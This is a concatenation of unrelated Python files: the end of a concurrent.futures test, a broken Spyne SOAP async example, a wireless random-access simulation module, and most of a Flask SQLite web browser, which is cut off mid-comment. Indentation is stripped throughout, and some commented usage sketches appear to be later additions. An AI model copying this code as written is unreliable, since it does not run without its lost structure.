time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = test.support.threading_setup()
def tearDownModule():
test.support.threading_cleanup(*_threads_key)
test.support.reap_children()
# cleanup multiprocessing
multiprocessing.process._cleanup()
# Stop the ForkServer process if it's running
from multiprocessing import forkserver
forkserver._forkserver._stop()
# bpo-37421: Explicitly call _run_finalizers() to remove immediately
# temporary directories created by multiprocessing.util.get_temp_dir().
multiprocessing.util._run_finalizers()
test.support.gc_collect()
if __name__ == "__main__":
unittest.main()
|
async.py
|
#!/usr/bin/env python
# encoding: utf8
#
# Copyright © Burak Arslan <burak at arskom dot com dot tr>,
# Arskom Ltd. http://www.arskom.com.tr
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the owner nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# FIXME: This example is not working. It's here just so we don't forget about
# it. Please ignore this.
#
import time
from threading import Thread
import logging
from spyne.application import Application
from spyne.decorator import rpc
from spyne.decorator import srpc
from spyne.interface.wsdl import Wsdl11
from spyne.protocol.soap import Soap11
from spyne.service import ServiceBase
from spyne.model.primitive import String
from spyne.model.primitive import Integer
from spyne.util import get_callback_info
from spyne.server.wsgi import WsgiApplication
'''
This is a very simple async service that sleeps for a specified
number of seconds and then calls the caller back with a message.
It kicks off a new Thread for each request, which is not recommended
for a real-world application. Spyne does not provide any thread
management or scheduling mechanism; the service is responsible for the
execution of the async process.
'''
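# Hedged client-side sketch (not part of the original example, which is marked
# broken above): with a generic SOAP client such as suds, invoking the async
# operation might look roughly like the following. The URL and the suds
# dependency are assumptions for illustration only.
#
#   from suds.client import Client
#   client = Client('http://localhost:7789/?wsdl')
#   client.service.sleep(5)  # the service later calls back woke_up(...) via the reply-to address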
class SleepingService(ServiceBase):
@rpc(Integer, _is_async=True)
def sleep(self, seconds):
msgid, replyto = get_callback_info()
def run():
time.sleep(seconds)
client = make_service_client(replyto, self)
client.woke_up('good morning', msgid=msgid)
Thread(target=run).start()
@srpc(String, _is_callback=True)
def woke_up(message):
pass
if __name__=='__main__':
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('spyne.protocol.xml').setLevel(logging.DEBUG)
try:
from wsgiref.simple_server import make_server
except ImportError:
    logging.error("Error: example server code requires Python >= 2.5")
application = Application([SleepingService], 'spyne.examples.async',
interface=Wsdl11(), in_protocol=Soap11(), out_protocol=Soap11())
server = make_server('127.0.0.1', 7789, WsgiApplication(application))
logging.info("listening to http://127.0.0.1:7789")
logging.info("wsdl is at: http://localhost:7789/?wsdl")
server.serve_forever()
|
raputil.py
|
#!/usr/bin/python
from __future__ import division
import numpy as np
import math
import os
import time
import numpy.linalg as la
from tools.tfinterp import interp1d_
sqrt=np.sqrt
pi = math.pi
def hexagonal_uniform(N,as_complex=False):
'returns uniformly distributed points of shape=(2,N) within a hexagon whose minimum radius is 1.0'
phi = 2*pi/6 *.5
    S = np.array( [[1,1],np.tan([phi,-phi])] ) # vectors to vertices of next hexagon ( centered at (2,0) )
# uniformly sample the parallelogram defined by the columns of S
v = np.matmul(S,np.random.uniform(0,1,(2,N)))
v[0] = 1 - abs(v[0]-1) # fold back to make a triangle
c = (v[0] + 1j*v[1]) * np.exp( 2j*pi/6*np.floor( np.random.uniform(0,6,N) ) ) # rotate to a random sextant
if as_complex:
return c
else:
return np.array( (c.real,c.imag) )
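# Hedged usage sketch (illustration only, not used elsewhere in this module):
# sample points and check that they fall inside the hexagon of minimum radius
# 1.0, whose maximum (vertex) radius is 2/sqrt(3).
#
#   pts = hexagonal_uniform(1000, as_complex=True)
#   assert pts.shape == (1000,) and np.all(abs(pts) <= 2/np.sqrt(3) + 1e-9)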
def left_least_squares(x,y,rcond=-1,fast=False):
    'find the A that best fits y = A @ x in the least-squares sense (minimizing ||y - A*x||)'
if fast:
return la.lstsq( np.matmul(x,x.T) ,np.matmul(x,y.T) ,rcond=rcond )[0].T # faster, but less stable
else:
return la.lstsq( x.T,y.T,rcond=rcond)[0].T
def rms(x,axis=None):
    'calculate the root-mean-square of a signal; if axis is not None, the reduction is only along the given axis/axes'
if np.iscomplexobj(x):
x=abs(x)
return np.sqrt(np.mean(np.square(x),axis) )
def nlfunc(r,sc,grid,gg,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g = r * np.interp(r/sc,grid,gg)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr = sc * (grid[1]-grid[0]) * 1e-3
dgdr = (nlfunc(r+.5*dr,sc,grid,gg,False) - nlfunc(r-.5*dr,sc,grid,gg,False)) / dr
return (g,dgdr)
else:
return g
def nlfunc_(r_,sc_,grid,gg_,return_gradient=True):
'returns xhat_nl = rhat_nl * interp( rhat_nl / sc,grid,gg) and optionally the gradient of xhat_nl wrt rhat_nl'
g_ = r_ * interp1d_(r_/sc_,grid,gg_)
if return_gradient:
#I had some code that computed the gradient, but it was far more complicated and no faster than just computing the empirical gradient
# technically, this computes a subgradient
dr_ = sc_ * (grid[1]-grid[0]) * 1e-3
dgdr_ = (nlfunc_(r_+.5*dr_,sc_,grid,gg_,False) - nlfunc_(r_-.5*dr_,sc_,grid,gg_,False)) / dr_
return (g_,dgdr_)
else:
return g_
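# Hedged example for nlfunc (values are illustrative only): with a gain table
# gg over grid, small magnitudes are shrunk toward zero and large ones pass
# through, roughly like a soft threshold. The second return value is the
# empirical (sub)gradient described in the function body.
#
#   grid = np.linspace(0.0, 4.0, 41)
#   gg = np.clip(1.0 - 1.0/np.maximum(grid, 1e-12), 0.0, 1.0)
#   xhat, dxdr = nlfunc(np.array([0.5, 2.0, 3.0]), sc=1.0, grid=grid, gg=gg)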
def crandn(shape,set_mag=None):
    'circularly symmetric Gaussian with variance 2 (real and imag each with variance 1)'
X= np.random.normal( size=tuple(shape)+(2,)).view(np.complex128)[...,0]
if set_mag is not None:
X = X *set_mag / abs(X)
return X
def random_qpsk( *shape):
return ((np.random.uniform( -1,1,size=shape+(2,) ) > 0)*2-1).astype(np.float32).view(np.complex64)[...,0]
class Problem(object):
@staticmethod
def scenario1():
return dict(Nr=1,C=1,Nu=512,Ns=64,beta=.01,SNR_dB=10.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
@staticmethod
def scenario2():
return dict(Nr=64,C=7,Nu=64,Ns=64,beta=1,SNR_dB=20.0,L=5,ang=10,rice_k_dB=10,ple=4,mmv2d=True,normS=1)
def __init__(self, Nr=64, C=7, Nu=64, Ns=64, beta=.01,L=5,ang=10,rice_k_dB=10,ple=4,SNR_dB=10.0,ambig=False,scramble=False,S=None,cpx=False,mmv2d=False,normS=None):
"""
Nr : number of Rx antennas
C : number of cells (>1 indicates there are "far" users)
Nu : max # users per cell
Ns : spreading code length
beta : user load (i.e.,expected active / total user ratio)
L : paths per cluster
ang : angular spread within cluster (in degrees)
rice_k_dB : rice k parameter in dB
ple : path-loss exponent: gain = 1/(1+d^ple) for distance d
S : set of spreading codes, shape=(Ns,C*Nu) """
if S is None:
S = random_qpsk(Ns,C*Nu)
self.Nr = Nr
self.C = C
self.Nu = Nu
self.Ns = Ns
self.beta = beta
self.L = L
self.ang = ang
self.rice_k_dB = rice_k_dB
self.ple = ple
self.SNR_dB = SNR_dB
self.ambig = ambig
self.scramble = scramble
self.cpx = cpx
self.mmv2d = mmv2d
if self.cpx == np.iscomplexobj(S):
self.S = S
else:
if not self.cpx:
top = np.concatenate( (S.real, -S.imag),axis=1 )
btm = np.concatenate( (S.imag, S.real),axis=1 )
self.S = np.concatenate( (top,btm),axis=0 )
else:
assert False,'WHY!?'
if self.cpx:
assert self.S.shape == (Ns,C*Nu)
else:
assert self.S.shape == (2*Ns,2*C*Nu)
if normS is not None:
dnorm = np.asarray(normS) / np.sqrt( np.square(self.S).sum(axis=0) )
self.S = self.S * dnorm
        self.timegen = 0  # time spent waiting for generation of YX (does NOT count subprocess CPU time if nsubprocs>0)
def genX(self,batches=1):
"""generate one or more batches(i.e. random draws) of active users with Ricean channels
batches : number of independent realizations to generate
If cpx, the returned X has shape (batches,C*Nu,Nr),
otherwise (batches,2*C*Nu,Nr)
"""
Nr,C,Nu,Ns,S = self.Nr,self.C,self.Nu,self.Ns,self.S
L,ang,rice_k_dB,ple = self.L,self.ang,self.rice_k_dB,self.ple
X = np.zeros((batches,C,Nu,Nr),dtype=np.complex64)
for i in range(batches):
            for c in range(C):  # c==0 indicates all users are in the base station's cell ("near")
###################################
# choose how many and which users are active in this cell
K = np.random.binomial(Nu,self.beta) # number of active users in this cell E[K] = Nu*beta
active_users = np.random.permutation(Nu)[:K]
#NOTE: Tensors below have shape (user,path,angle), until Z when we sum the path dimension.
# how far (weak) is each user?
if c==0:
dist = abs( hexagonal_uniform( K ,as_complex=True) )
elif 0<c<7:
dist = abs( 2+hexagonal_uniform( K ,as_complex=True) )
else:
assert False,'assuming 1 or 7 hexagonal cells'
dist.shape = (K,1,1)
gain = 1/(1+dist**ple)
# The L paths per user impinge on our linear array with clustered angles theta.
# All paths per user start at theta0 and are uniformly distributed in the next `ang` degrees.
# (theta units=radians,zero means broadside to the linear array)
theta0 = np.random.uniform(0,2*pi,(K,1,1))
theta = np.mod( theta0 + np.random.uniform(0,ang*pi/180,(K,L,1)) ,2*pi)
# different Ricean gains for each of the paths
direct_path = crandn((K,1,1),set_mag=1.0) # one dominant path component
other_paths = 10**(-rice_k_dB/20)*sqrt(.5)*crandn((K,L,1))
# each of the different paths impinges onto our linear array according to the array spacing and theta
E = gain*(direct_path + other_paths) * np.exp(1j* theta * np.arange(Nr) )
# sum the different paths, Z.shape is (user,angle)
Z = E.sum(axis=1)
if np.isnan(Z).any():
raise RuntimeError()
# update the data set for these users' signal
X[i,c,active_users] = np.fft.fft(Z,Nr,axis=-1)/Nr
###################################
# collapse the C and Nu dimensions into one
X.shape = (batches,C*Nu,Nr)
if self.ambig:
X = X[:,np.random.permutation(C*Nu),:]
if not self.cpx:
X2 = np.empty( (batches,2*C*Nu,Nr),np.float32)
X2[:,:C*Nu,:] = X.real
X2[:,C*Nu:,:] = X.imag
X = X2
if self.scramble:
shp = X.shape
X = np.random.permutation(X.ravel())
X.shape = shp
if self.mmv2d:
# the "sample vector" dimension should remain in second-to-last dimension
N = X.shape[-2]
X = np.reshape( np.transpose(X,(1,0,2)) ,(N,-1) )
return X
def fwd(self,X):
'forward linear operator'
assert np.iscomplexobj(X) == self.cpx,'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S)
def adj(self,X):
'adjoint linear operator'
        assert np.iscomplexobj(X) == self.cpx, 'wrong value for cpx in constructor'
return np.einsum('...jk,mj->...mk',X,self.S.T.conj())
def add_noise(self,Y0):
'add noise at the given SNR, returns Y0+W,wvar'
wvar = (la.norm(Y0)**2/Y0.size) * 10**(-self.SNR_dB/10)
if self.cpx:
Y =(Y0 + crandn(Y0.shape) * sqrt(wvar/2)).astype(np.complex64,copy=False)
else:
Y = (Y0 + np.random.normal(scale=sqrt(wvar),size=Y0.shape) ).astype(np.float32,copy=False)
return Y,wvar
def genYX(self,batches=1,nsubprocs=None):
t0 = time.time()
if nsubprocs is None:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
else:
if not hasattr(self,'qgen'):
import multiprocessing as mp
self.qgen = mp.Queue(maxsize=nsubprocs) # one slot per subprocess
def makesets():
np.random.seed() #MUST reseed or every subprocess will generate the same data
while True:
X = self.genX(batches)
Y0 = self.fwd(X)
Y,_ = self.add_noise(Y0)
self.qgen.put((Y,X),block=True)
self.subprocs = []
for i in range(nsubprocs):
prc = mp.Process(target=makesets)
prc.daemon=True
prc.start()
self.subprocs.append(prc)
Y,X = self.qgen.get(True)
et = time.time() - t0
self.timegen += et
return (Y,X)
def kill_subprocs(self):
if hasattr(self,'qgen') and hasattr(self,'subprocs'):
for prc in self.subprocs:
prc.terminate()
prc.join()
del self.qgen
del self.subprocs
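# Hedged usage sketch (uses only names defined in this module): build a
# Problem from one of the canned scenarios and draw a noisy measurement pair.
#
#   p = Problem(**Problem.scenario1())
#   Y, X = p.genYX(batches=2)   # Y = S applied to X plus AWGN at p.SNR_dB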
if __name__ == '__main__':
import unittest
class RapTest(unittest.TestCase):
def _test_awgn(self,cpx):
snr = np.random.uniform(3,20)
p = Problem(cpx=cpx,SNR_dB=snr)
X = p.genX(5)
self.assertEqual( np.iscomplexobj(X) , cpx )
Y0 = p.fwd(X)
self.assertEqual( np.iscomplexobj(Y0) , cpx )
Y,wvar = p.add_noise(Y0)
self.assertEqual( np.iscomplexobj(Y) , cpx )
snr_obs = -20*np.log10( la.norm(Y-Y0)/la.norm(Y0))
self.assertTrue( abs(snr-snr_obs) < 1.0, 'gross error in add_noise')
wvar_obs = la.norm(Y0-Y)**2/Y.size
self.assertTrue( .5 < wvar_obs/wvar < 1.5, 'gross error in add_noise wvar')
def test_awgn_cpx(self):
self._test_awgn(True)
def test_awgn_real(self):
self._test_awgn(False)
unittest.main(verbosity=2)
#exec(open(os.environ['PYTHONSTARTUP']).read(),globals(),globals())
|
sqlite_web.py
|
#!/usr/bin/env python
import datetime
import hashlib
import math
import operator
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
from io import TextIOWrapper
# Py2k compat.
if sys.version_info[0] == 2:
PY2 = True
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
else:
PY2 = False
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version < (3, 0, 0):
        raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
                           'Please update by running pip install --upgrade '
                           'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
from playhouse.sqlite_ext import SqliteExtDatabase
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
table=table,
total_pages=total_pages,
total_rows=total_rows)
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
# Here we need to translate the file stream. Werkzeug uses a
# spooled temporary file opened in wb+ mode, which is not
# compatible with Python's CSV module. We'd need to reach pretty
# far into Flask's internals to modify this behavior, so instead
# we'll just translate the stream into utf8-decoded unicode.
if not PY2:
try:
stream = TextIOWrapper(file_obj, encoding='utf8')
except AttributeError:
# The SpooledTemporaryFile used by werkzeug does not
# implement an API that the TextIOWrapper expects, so we'll
# just consume the whole damn thing and decode it.
# Fixed in werkzeug 0.15.
stream = StringIO(file_obj.read().decode('utf8'))
else:
stream = file_obj.stream
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
dataset.update_cache() # Update all tables.
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile(r'(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
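# Illustrative note (hypothetical input, not exercised programmatically): for
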